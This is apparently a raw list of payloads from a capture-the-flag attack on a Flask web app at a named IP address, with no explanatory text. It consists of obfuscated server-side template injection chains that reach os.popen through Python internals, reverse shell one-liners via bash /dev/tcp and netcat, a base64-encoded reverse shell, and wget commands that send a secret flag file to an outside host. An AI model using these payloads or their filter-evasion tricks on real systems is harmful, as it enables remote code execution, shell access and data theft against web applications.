''['__cla''ss__']['__mr''o__'][1]['__sub''clas''ses__']()[414]

http://40.115.138.119:10002/docs/''['__cl'['__add__']('ass__')]['__ba'['__add__']('se__')]['__subcl'['__add__']('asses__')]()[80]['__in'['__add__']('it__')]['__glo'['__add__']('bals__')]['__buil'['__add__']('tins__')]['__imp'['__add__']('ort__')]('flask')['con'['__add__']('fig')]

''['__add__'](dict['__do']['__add__']('c__')[187]['__add__'](dict['__do']['__add__']('c__')[187]))


dict['__do'['__add__']('c__')]['__s


''['__add__'](dict['__do'['__add__']('c__')[187])


get_flashed_messages['__global'['__add__']('s__')]['__builti'['__add__']('ns__')]['__impor'['__add__']('t__')]('os')

http://40.115.138.119:10002/docs/''['__cl'['__add__']('ass__')]['__ba'['__add__']('se__')]['__subcl'['__add__']('asses__')]()[80]['__in'['__add__']('it__')]['__glo'['__add__']('bals__')]['__buil'['__add__']('tins__')]['__imp'['__add__']('ort__')]('os')['pop'['__add__']('en')]('')['rea'['__add__']('d')]()

sh -i >& /dev/udp/40.115.138.119/1337 0>&1

bash -i >& /dev/tcp/40.115.138.119/1337 0>&1

http://40.115.138.119:10002/docs/''['__cl'['__add__']('ass__')]['__ba'['__add__']('se__')]['__subcl'['__add__']('asses__')]()[80]['__in'['__add__']('it__')]['__glo'['__add__']('bals__')]['__buil'['__add__']('tins__')]['__imp'['__add__']('ort__')]('os')['pop'['__add__']('en')]('cat'['__add__'](''['__doc__'][14])['__add__']('secret_fla'))['rea'['__add__']('d')]()

http://40.115.138.119:10002/docs/''['__cl'['__add__']('ass__')]['__ba'['__add__']('se__')]['__subcl'['__add__']('asses__')]()[80]['__in'['__add__']('it__')]['__glo'['__add__']('bals__')]['__buil'['__add__']('tins__')]['__imp'['__add__']('ort__')]('os')['pop'['__add__']('en')](BAKA)['rea'['__add__']('d')]()

http://40.115.138.119:10002/docs/''['__cl'['__add__']('ass__')]['__ba'['__add__']('se__')]['__subcl'['__add__']('asses__')]()[80]['__in'['__add__']('it__')]['__glo'['__add__']('bals__')]['__buil'['__add__']('tins__')]['__imp'['__add__']('ort__')]('os')['pop'['__add__']('en')]('nc'['__add__'](''['__doc__'][14])['__add__']('40')['__add__'](''['__doc__'][121])['__add__']('115')['__add__'](''['__doc__'][121])['__add__']('138')['__add__'](''['__doc__'][121])['__add__']('119')['__add__'](''['__doc__'][14])['__add__']('1337')['__add__'](''['__doc__'][14])['__add__'](''['__doc__'][15])['__add__']('e')['__add__'](''['__doc__'][14])['__add__']('sh'))['rea'['__add__']('d')]()

'c2ggLWkgPiYgL2Rldi91ZHAvNDAuMTE1LjEzOC4xMTkvMTMzNyAwPiYx'

'c2ggLWkgPiYgL2Rldi91ZHAvNDAuMTE1LjEzOC4xMTkvMTMzNyAwPiYx'


'nc 40.115.138.119 1337 -e sh'

'wget 40.115.138.119:1337?a=$(cat<secret_flag)'

'wget'['__add__'](''['__doc__'][14])['__add__']('40')['__add__'](''['__doc__'][121])['__add__']('115')['__add__'](''['__doc__'][121])['__add__']('138')['__add__'](''['__doc__'][121])['__add__']('119')['__add__'](':1337/')['__add__'](''['__cl'['__add__']('ass__')]['__ba'['__add__']('se__')]['__subcl'['__add__']('asses__')]()[80]['__in'['__add__']('it__')]['__glo'['__add__']('bals__')]['__buil'['__add__']('tins__')]['__imp'['__add__']('ort__')]('os')['__doc__'][604])['__add__']('(cat<secret_flag)')


'sh'['__add__'](''['__doc__'][14])['__add__'](''['__doc__'][15])['__add__']('i')['__add__'](''['__doc__'][14])['__add__']('')
'nc'['__add__'](''['__doc__'][14])['__add__']('40')['__add__'](''['__doc__'][121])['__add__']('115')['__add__'](''['__doc__'][121])['__add__']('138')['__add__'](''['__doc__'][121])['__add__']('119')['__add__'](''['__doc__'][14])['__add__']('1337')['__add__'](''['__doc__'][14])['__add__'](''['__doc__'][15])['__add__']('e')['__add__'](''['__doc__'][14])['__add__']('sh')

http://40.115.138.119:10002/docs/''['__cl'['__add__']('ass__')]['__ba'['__add__']('se__')]['__subcl'['__add__']('asses__')]()[80]['__in'['__add__']('it__')]['__glo'['__add__']('bals__')]['__buil'['__add__']('tins__')]['__imp'['__add__']('ort__')]('os')['pop'['__add__']('en')]('wget'['__add__'](''['__do'['__add__']('c__')][14])['__add__']('40')['__add__'](''['__do'['__add__']('c__')][121])['__add__']('115')['__add__'](''['__do'['__add__']('c__')][121])['__add__']('138')['__add__'](''['__do'['__add__']('c__')][121])['__add__']('119')['__add__'](':1337'['__add__'](''['__cl'['__add__']('ass__')]['__ba'['__add__']('se__')]['__subcl'['__add__']('asses__')]()[80]['__in'['__add__']('it__')]['__glo'['__add__']('bals__')]['__buil'['__add__']('tins__')]['__imp'['__add__']('ort__')]('flask')['session']['__do'['__add__']('c__')][558]))['__add__'](''['__cl'['__add__']('ass__')]['__ba'['__add__']('se__')]['__subcl'['__add__']('asses__')]()[80]['__in'['__add__']('it__')]['__glo'['__add__']('bals__')]['__buil'['__add__']('tins__')]['__imp'['__add__']('ort__')]('os')['__do'['__add__']('c__')][604])['__add__']('(grep'['__add__'](''['__do'['__add__']('c__')][14])['__add__'](''['__do'['__add__']('c__')][15])['__add__']('r')['__add__'](''['__do'['__add__']('c__')][14])['__add__']('gemastik13'['__add__'](''['__do'['__add__']('c__')][14])['__add__']('*)'))))['rea'['__add__']('d')]()


http://40.115.138.119:10002/docs/''['__cl'['__add__']('ass__')]['__ba'['__add__']('se__')]['__subcl'['__add__']('asses__')]()[80]['__in'['__add__']('it__')]['__glo'['__add__']('bals__')]['__buil'['__add__']('tins__')]['__imp'['__add__']('ort__')]('os')['pop'['__add__']('en')]('nc'['__add__'](''['__do'['__add__']('c__')][14])['__add__']('40')['__add__'](''['__do'['__add__']('c__')][121])['__add__']('115')['__add__'](''['__do'['__add__']('c__')][121])['__add__']('138')['__add__'](''['__do'['__add__']('c__')][121])['__add__']('119')['__add__'](''['__do'['__add__']('c__')][14])['__add__']('1337')['__add__'](''['__do'['__add__']('c__')][14])['__add__']('<secret_flag'))['rea'['__add__']('d')]()
